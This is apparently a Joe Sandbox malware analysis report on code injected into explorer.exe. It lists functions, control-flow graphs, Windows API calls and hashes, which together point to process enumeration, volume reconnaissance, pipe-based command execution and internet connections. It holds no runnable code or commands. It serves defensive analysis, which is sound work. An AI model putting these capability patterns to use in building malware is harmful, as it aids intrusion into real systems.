                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 323e24aefe1eb8265c58f2d108468d8cb0d1559239c2e860e07bd96b95da3856
                                                                                                                      • Instruction ID: a2af41deb9c0b18a5c58d1e661664faa1839c2cacfc88b700f3ff76f3e6dc75c
                                                                                                                      • Opcode Fuzzy Hash: 323e24aefe1eb8265c58f2d108468d8cb0d1559239c2e860e07bd96b95da3856
                                                                                                                      • Instruction Fuzzy Hash: 47312531209A8586EB30AB7DE84436976A4FF5637CFD00715E9EA86AE4DF38C508C716
                                                                                                                      Function 013A7134 Relevance: 6.0, APIs: 4, Instructions: 28processCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 420147892-0
                                                                                                                      • Opcode ID: cdc7aee9f013cd292d3a54cae21fe1e19c0375bd4ba8170c7a395ade045eb3ec
                                                                                                                      • Instruction ID: bcf7207581e3357de70201907a33724ba48ec5f9657bb991fb30e21c22b4d381
                                                                                                                      • Opcode Fuzzy Hash: cdc7aee9f013cd292d3a54cae21fe1e19c0375bd4ba8170c7a395ade045eb3ec
                                                                                                                      • Instruction Fuzzy Hash: BD01CD7261864087E770DB15E89875AB771FBC8758F841215E6CE86A68DF3CC645CB00
                                                                                                                      Function 013A720C Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 213 13a720c-13a7257 call 13a9674 * 2 FindFirstVolumeW 218 13a7259-13a725b 213->218 219 13a725d-13a72b4 GetVolumeInformationW FindVolumeClose 213->219 220 13a72c1-13a72c8 218->220 221 13a72bf 219->221 222 13a72b6-13a72bd 219->222 221->220 222->220
                                                                                                                      APIs
                                                                                                                      • FindFirstVolumeW.KERNEL32 ref: 013A7246
                                                                                                                      • GetVolumeInformationW.KERNEL32 ref: 013A729A
                                                                                                                      • FindVolumeClose.KERNEL32 ref: 013A72A9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Volume$Find$CloseFirstInformation
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 586543143-0
                                                                                                                      • Opcode ID: 768f91987acb0c695470ea88eccb12ca23a753f039ee139f7be31bd804ab313f
                                                                                                                      • Instruction ID: f374b1de3115e30bf83c24acba3033862cb27b750d7eb559b4c45fefee6f98a5
                                                                                                                      • Opcode Fuzzy Hash: 768f91987acb0c695470ea88eccb12ca23a753f039ee139f7be31bd804ab313f
                                                                                                                      • Instruction Fuzzy Hash: 8A110676218A4082D720DB54E48839AB7A5F7D5364FD00226E6EE82EA8DF7DC649CB00
                                                                                                                      Function 013A52FC Relevance: 1.5, APIs: 1, Instructions: 17threadCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 239 13a52fc-13a5331 CreateThread 240 13a533a 239->240 241 13a5333-13a5338 239->241 242 13a533c-13a5340 240->242 241->242
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2422867632-0
                                                                                                                      • Opcode ID: 5802a47e0c15a1cd7a8c8b1221fd48acd5efe2fce56945e0ed08bc57f422bd73
                                                                                                                      • Instruction ID: c889c484a929c8dbd4eb707b39998baa562ea8bf2b2908d6b1b3133450d8a442
                                                                                                                      • Opcode Fuzzy Hash: 5802a47e0c15a1cd7a8c8b1221fd48acd5efe2fce56945e0ed08bc57f422bd73
                                                                                                                      • Instruction Fuzzy Hash: A4E04F32618B80C5D364DB10F44438A7BA0F7D4398FC45015E68B42F64CF7CC145CB00

                                                                                                                      Non-executed Functions

                                                                                                                      Function 013A1030 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 206pipefileprocessCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • CreatePipe.KERNEL32 ref: 013A10FF
                                                                                                                      • SetHandleInformation.KERNEL32 ref: 013A1119
                                                                                                                      • CreatePipe.KERNEL32 ref: 013A113A
                                                                                                                      • SetHandleInformation.KERNEL32 ref: 013A1154
                                                                                                                      • CreatePipe.KERNEL32 ref: 013A1175
                                                                                                                      • SetHandleInformation.KERNEL32 ref: 013A118F
                                                                                                                      • CreateProcessW.KERNEL32 ref: 013A1251
                                                                                                                        • Part of subcall function 013A958C: NtAllocateVirtualMemory.NTDLL ref: 013A95C2
                                                                                                                      • PeekNamedPipe.KERNEL32 ref: 013A1300
                                                                                                                      • ReadFile.KERNEL32 ref: 013A135C
                                                                                                                      • PeekNamedPipe.KERNEL32 ref: 013A13B0
                                                                                                                      • ReadFile.KERNEL32 ref: 013A140C
                                                                                                                      • GetExitCodeProcess.KERNEL32 ref: 013A1445
                                                                                                                      • TerminateProcess.KERNEL32 ref: 013A1476
                                                                                                                      • CloseHandle.KERNEL32 ref: 013A1484
                                                                                                                        • Part of subcall function 013AA5CC: NtDelayExecution.NTDLL ref: 013AA5EE
                                                                                                                      • CloseHandle.KERNEL32 ref: 013A1492
                                                                                                                      • CloseHandle.KERNEL32 ref: 013A14A0
                                                                                                                      • CloseHandle.KERNEL32 ref: 013A14AE
                                                                                                                        • Part of subcall function 013A6814: NtFreeVirtualMemory.NTDLL ref: 013A6845
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Handle$Pipe$CloseCreate$InformationProcess$FileMemoryNamedPeekReadVirtual$AllocateCodeDelayExecutionExitFreeTerminate
                                                                                                                      • String ID: h
                                                                                                                      • API String ID: 30365702-2439710439
                                                                                                                      • Opcode ID: c7d07e09b63113d12c3960b54df5b5ce4c9d8a25339ef27ee453aadfe6a9e22f
                                                                                                                      • Instruction ID: b2a205a135566a76f1c9fb242d3cefa5fe7b058bcd81fba88a3f38a8dc9bfe91
                                                                                                                      • Opcode Fuzzy Hash: c7d07e09b63113d12c3960b54df5b5ce4c9d8a25339ef27ee453aadfe6a9e22f
                                                                                                                      • Instruction Fuzzy Hash: 86C1B036208BC08AE760DF69E49479AB7A1F7C4748F804115EAC987E68DFBDC548CF40
                                                                                                                      Function 013A6464 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 31nativefileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseFileInitOpenStringUnicode
                                                                                                                      • String ID: $0$@
                                                                                                                      • API String ID: 3719522541-2347541974
                                                                                                                      • Opcode ID: 605d7dc3094dec6d153950563200a73cee3e8371e45e97b2015d5a91e13fe6ac
                                                                                                                      • Instruction ID: 9a6540a680549076f5eeab9b36a38146a1e2c7f78651d5335607a87bb46022ab
                                                                                                                      • Opcode Fuzzy Hash: 605d7dc3094dec6d153950563200a73cee3e8371e45e97b2015d5a91e13fe6ac
                                                                                                                      • Instruction Fuzzy Hash: 4B0108B2119A8186EB10DF14E45439BBB65F7D5798F900025E2CA42A78DB7DC689CF41
                                                                                                                      Function 013A650C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43nativefileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RtlInitUnicodeString.NTDLL ref: 013A6567
                                                                                                                        • Part of subcall function 013A641C: GetFileAttributesW.KERNEL32 ref: 013A6430
                                                                                                                      • NtCreateFile.NTDLL ref: 013A65E6
                                                                                                                      • NtClose.NTDLL ref: 013A6604
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: File$AttributesCloseCreateInitStringUnicode
                                                                                                                      • String ID: 0$@
                                                                                                                      • API String ID: 2504508917-1545510068
                                                                                                                      • Opcode ID: d37bebaa44e46b1ea15d6f7d7c3d0fc5b14d35d5efe591a57761ed940f6e4432
                                                                                                                      • Instruction ID: f95af3020142b5ede8cd1e77bf6d8b382f6aafca44f9b225e39e65deed029248
                                                                                                                      • Opcode Fuzzy Hash: d37bebaa44e46b1ea15d6f7d7c3d0fc5b14d35d5efe591a57761ed940f6e4432
                                                                                                                      • Instruction Fuzzy Hash: 8F21B2B2119B858AE720DF14F45838BB7A5F7C0348F904129E6CA47AA8CBBDD549CF41
                                                                                                                      Function 013A6618 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43filenativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFileInitStringUnicode
                                                                                                                      • String ID: 0$@
                                                                                                                      • API String ID: 2498367268-1545510068
                                                                                                                      • Opcode ID: 86db90e80f089865b597ac46aa5298f0e643e43c86b60b8b36283315fd73640f
                                                                                                                      • Instruction ID: 3e030fe37a6f5542c5f3bdf0d936ab8b7abafef06b97c4b493804117a40d5944
                                                                                                                      • Opcode Fuzzy Hash: 86db90e80f089865b597ac46aa5298f0e643e43c86b60b8b36283315fd73640f
                                                                                                                      • Instruction Fuzzy Hash: C321A3721187C486E760DF54F45478BBBA5F3C43A8F90821AE2D947AA8CB7DD549CF40
                                                                                                                      Function 013A1A08 Relevance: 6.1, APIs: 4, Instructions: 113fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 013A958C: NtAllocateVirtualMemory.NTDLL ref: 013A95C2
                                                                                                                      • FindFirstFileA.KERNEL32 ref: 013A1AC7
                                                                                                                      • wsprintfA.USER32 ref: 013A1B95
                                                                                                                      • FindNextFileA.KERNEL32 ref: 013A1BC2
                                                                                                                      • FindClose.KERNEL32 ref: 013A1BD5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$AllocateCloseFirstMemoryNextVirtualwsprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 65906682-0
                                                                                                                      • Opcode ID: d1ba784252355b4ec867587bebd2012ce15e15866c9c91a1bf3306cc3090962b
                                                                                                                      • Instruction ID: 759991389a073818ae663c8fc91dd3150b5f9e0463a66b9350106ef446eeb6b6
                                                                                                                      • Opcode Fuzzy Hash: d1ba784252355b4ec867587bebd2012ce15e15866c9c91a1bf3306cc3090962b
                                                                                                                      • Instruction Fuzzy Hash: A5512532219B8591DB20DB08F49039EB769FB9439CFC05225E6CE57AA8EF7CC245CB41
                                                                                                                      Function 013ADDF8 Relevance: .0, Instructions: 17COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c366498ca1ad9a9211bb63a0086326fd0b490cb1db94dbea9a14e8d7dbd25069
                                                                                                                      • Instruction ID: c416fbaf16e514b92abea586c072478a8086250b98d8612425497384cb98e5ce
                                                                                                                      • Opcode Fuzzy Hash: c366498ca1ad9a9211bb63a0086326fd0b490cb1db94dbea9a14e8d7dbd25069
                                                                                                                      • Instruction Fuzzy Hash: DFE02D97B9EBD04AD7138B781C249593F70A4B281439E81C7D784C7683D48D092CC362
                                                                                                                      Function 013ADB28 Relevance: .0, Instructions: 15COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 86da818267e0aeb7143933f2154234a85ad5d5952395101d3a8200e6c23022b0
                                                                                                                      • Instruction ID: d9b99f2c7095e69c9f99e2bac3e321f8aa29467d231ae527b5c350d8172cba1e
                                                                                                                      • Opcode Fuzzy Hash: 86da818267e0aeb7143933f2154234a85ad5d5952395101d3a8200e6c23022b0
                                                                                                                      • Instruction Fuzzy Hash: 45D05ED7DDEFD82FD323C6980C3A2582E42D6F6A097CE414DCB54637C3F08949548642
                                                                                                                      Function 013A1C38 Relevance: 15.2, APIs: 10, Instructions: 234processCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 288 13a1c38-13a1ca3 CreateToolhelp32Snapshot call 13a958c call 13a96d0 293 13a1cb4-13a1cbc 288->293 294 13a1ca5-13a1cb2 288->294 295 13a1cc1-13a1cd6 call 13a9f08 293->295 294->295 298 13a1cdc-13a1d04 Process32First 295->298 299 13a20f6-13a2114 call 13a9f08 295->299 300 13a1d06-13a1d25 Process32Next 298->300 301 13a1d27-13a1d51 call 13a958c Process32First 298->301 300->300 300->301 306 13a1d53 301->306 307 13a1da0-13a1db5 Process32First 301->307 308 13a1d5b-13a1d9e Process32Next 306->308 309 13a1dbb 307->309 310 13a20e1-13a20f0 call 13a6814 CloseHandle 307->310 308->307 308->308 311 13a1dc3-13a1ddb call 13a2154 309->311 310->299 316 13a1ddd 311->316 317 13a1de2-13a1de7 311->317 318 13a20c6-13a20db Process32Next 316->318 319 13a1dfa-13a1e35 call 13a96d0 317->319 320 13a1de9-13a1df5 call 13a9f08 317->320 318->310 318->311 324 13a1e46-13a1e4e 319->324 325 13a1e37-13a1e44 319->325 320->319 326 13a1e53-13a1e79 call 13a9f08 call 13a96d0 324->326 325->326 331 13a1e8a-13a1e92 326->331 332 13a1e7b-13a1e88 326->332 333 13a1e97-13a1ebd call 13a9f08 call 13a96d0 331->333 332->333 338 13a1ece-13a1ed6 333->338 339 13a1ebf-13a1ecc 333->339 340 13a1edb-13a1f1f wsprintfA call 13a9f08 call 13a96d0 338->340 339->340 345 13a1f30-13a1f38 340->345 346 13a1f21-13a1f2e 340->346 347 13a1f3d-13a1f63 call 13a9f08 call 13a96d0 345->347 346->347 352 13a1f74-13a1f7c 347->352 353 13a1f65-13a1f72 347->353 354 13a1f81-13a1fc5 wsprintfA call 13a9f08 call 13a96d0 352->354 353->354 359 13a1fd9-13a1fe1 354->359 360 13a1fc7-13a1fd7 354->360 361 13a1fe9-13a2043 call 13a9f08 call 13a21a8 call 13a14d8 call 13a96d0 359->361 360->361 370 13a2057-13a205f 361->370 371 13a2045-13a2055 361->371 372 13a2067-13a2090 call 13a9f08 call 13a96d0 370->372 371->372 377 13a2092-13a20a2 372->377 378 13a20a4-13a20ac 372->378 379 13a20b4-13a20c1 call 13a9f08 377->379 378->379 379->318
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Process32$FirstNext$wsprintf$AllocateCloseCreateHandleMemorySnapshotToolhelp32Virtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3605396869-0
                                                                                                                      • Opcode ID: 68b86124b21e2d62a513b62a54ce886e2b41238217d58cec15ea88e8fd5f8de2
                                                                                                                      • Instruction ID: 921803cf93d3fdd768f06563095c5d095bf09d75a2ff439f36cc56414a6a44db
                                                                                                                      • Opcode Fuzzy Hash: 68b86124b21e2d62a513b62a54ce886e2b41238217d58cec15ea88e8fd5f8de2
                                                                                                                      • Instruction Fuzzy Hash: 26C1DC72209BC599DA30DB18E4903DAB7A5FB99398FC05125D7CE43B68EF38C649CB41
                                                                                                                      Function 013A36A4 Relevance: 12.2, APIs: 8, Instructions: 237COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 013A958C: NtAllocateVirtualMemory.NTDLL ref: 013A95C2
                                                                                                                        • Part of subcall function 013A686C: SHGetFolderPathW.SHELL32 ref: 013A689F
                                                                                                                      • wsprintfW.USER32 ref: 013A37E1
                                                                                                                      • wsprintfW.USER32 ref: 013A383C
                                                                                                                      • wsprintfW.USER32 ref: 013A3957
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: wsprintf$AllocateFolderMemoryPathVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 206084008-0
                                                                                                                      • Opcode ID: ddf5fbbb4f2e1cc25b3c4c068ba6345bc1fd0bac0b7add754e8d56e7b1f893de
                                                                                                                      • Instruction ID: f56813b6bc3d4ded35ba24143b00a98ad07a90ec83f6bd982a02d7edef87c727
                                                                                                                      • Opcode Fuzzy Hash: ddf5fbbb4f2e1cc25b3c4c068ba6345bc1fd0bac0b7add754e8d56e7b1f893de
                                                                                                                      • Instruction Fuzzy Hash: AAC11572219BC695DB60DB18F49039BB7A5FBD5398FC00126D6CE93A68EF38C108CB41
                                                                                                                      Function 013A47FC Relevance: 11.0, APIs: 7, Instructions: 467threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • wsprintfA.USER32 ref: 013A4C63
                                                                                                                      • wsprintfA.USER32 ref: 013A4D52
                                                                                                                      • wsprintfA.USER32 ref: 013A4E79
                                                                                                                      • new[].LIBCPMTD ref: 013A4F21
                                                                                                                        • Part of subcall function 013A3DCC: InternetCloseHandle.WININET ref: 013A3FDF
                                                                                                                        • Part of subcall function 013A3DCC: InternetCloseHandle.WININET ref: 013A3FF2
                                                                                                                      • new[].LIBCPMTD ref: 013A504F
                                                                                                                      • GetExitCodeThread.KERNEL32 ref: 013A526F
                                                                                                                      • GetExitCodeThread.KERNEL32 ref: 013A52A8
                                                                                                                        • Part of subcall function 013A958C: NtAllocateVirtualMemory.NTDLL ref: 013A95C2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: wsprintf$CloseCodeExitHandleInternetThreadnew[]$AllocateMemoryVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 511820185-0
                                                                                                                      • Opcode ID: 9a53138017393b77659cbd96c37399e690dd18bef0a4d7cedef38479ed5ff6f4
                                                                                                                      • Instruction ID: 26c685f9644e883385cca5bd7a7dd7df314ec9f91dd321c4a51d881d65aa40b2
                                                                                                                      • Opcode Fuzzy Hash: 9a53138017393b77659cbd96c37399e690dd18bef0a4d7cedef38479ed5ff6f4
                                                                                                                      • Instruction Fuzzy Hash: 3F42B272108BC58AEB70DB59E8843DAB7A4F788748F944126D6CD97B68DFBCC184CB41
                                                                                                                      Function 013A9BF4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: File$View$CloseCreateFreeHandleMappingUnmapVirtual
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 1610889594-2766056989
                                                                                                                      • Opcode ID: e555f887ff18da87b0e2439894c02dfc6696c06c2e334d7a2ec0df01d2e70b26
                                                                                                                      • Instruction ID: bc237f735a206d976c60240b0a69c2dd3f32da0e62044cf509b325e0a486a83f
                                                                                                                      • Opcode Fuzzy Hash: e555f887ff18da87b0e2439894c02dfc6696c06c2e334d7a2ec0df01d2e70b26
                                                                                                                      • Instruction Fuzzy Hash: B1411A36218F8582DB60DB19E49039AB7A4F7C5B98F905121EB8E53FA8DF3CC584CB40
                                                                                                                      Function 013A14D8 Relevance: 7.7, APIs: 5, Instructions: 176processCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Process32wsprintf$CreateFirstNextSnapshotToolhelp32
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4137211488-0
                                                                                                                      • Opcode ID: 7eea74f87dacce698b870b1a2ba75b8273ec79f2ff96aa3ed2a51bf1c3b735be
                                                                                                                      • Instruction ID: b2612fdd3b8bb477c935b806c8da83a7ea42c7d91c0c89b21eb3ca0d70be0203
                                                                                                                      • Opcode Fuzzy Hash: 7eea74f87dacce698b870b1a2ba75b8273ec79f2ff96aa3ed2a51bf1c3b735be
                                                                                                                      • Instruction Fuzzy Hash: 9191F636219BC5D6DA20DB19E48039AB7A9FB88398FD01625DBCD43B68EF39C145CF40
                                                                                                                      Function 013A75E8 Relevance: 7.6, APIs: 5, Instructions: 92networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$CloseHandleOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 435140893-0
                                                                                                                      • Opcode ID: e13d167ae56c5d6715b12e014b0a9c0a3333b75254ca4224abbfca198421a6d3
                                                                                                                      • Instruction ID: 65514f0a76519c7819de22b0d6ebfbc8509df70ab18c68d0611a86832d3e78d8
                                                                                                                      • Opcode Fuzzy Hash: e13d167ae56c5d6715b12e014b0a9c0a3333b75254ca4224abbfca198421a6d3
                                                                                                                      • Instruction Fuzzy Hash: A541D276228A8486D760CF19F49476EB7A0F7C5B88F905015EB8A87B68DF7EC844CB44
                                                                                                                      Function 013A9A50 Relevance: 7.6, APIs: 5, Instructions: 79processCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandlewsprintf$CreateProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2803068115-0
                                                                                                                      • Opcode ID: 5e94fd10b78efaa95e8bd1e1d463ca9a116d3642b6ccd52b03ae319f4b617b43
                                                                                                                      • Instruction ID: 1f1e322167e01d0c8c88e49d9b096049386c3e17ad0a46b04575caa6f4d02d07
                                                                                                                      • Opcode Fuzzy Hash: 5e94fd10b78efaa95e8bd1e1d463ca9a116d3642b6ccd52b03ae319f4b617b43
                                                                                                                      • Instruction Fuzzy Hash: EF411A72208B8596EB60CF14E4503DBB7A5FBD5398F804126D6C993E68EF7CC259CB40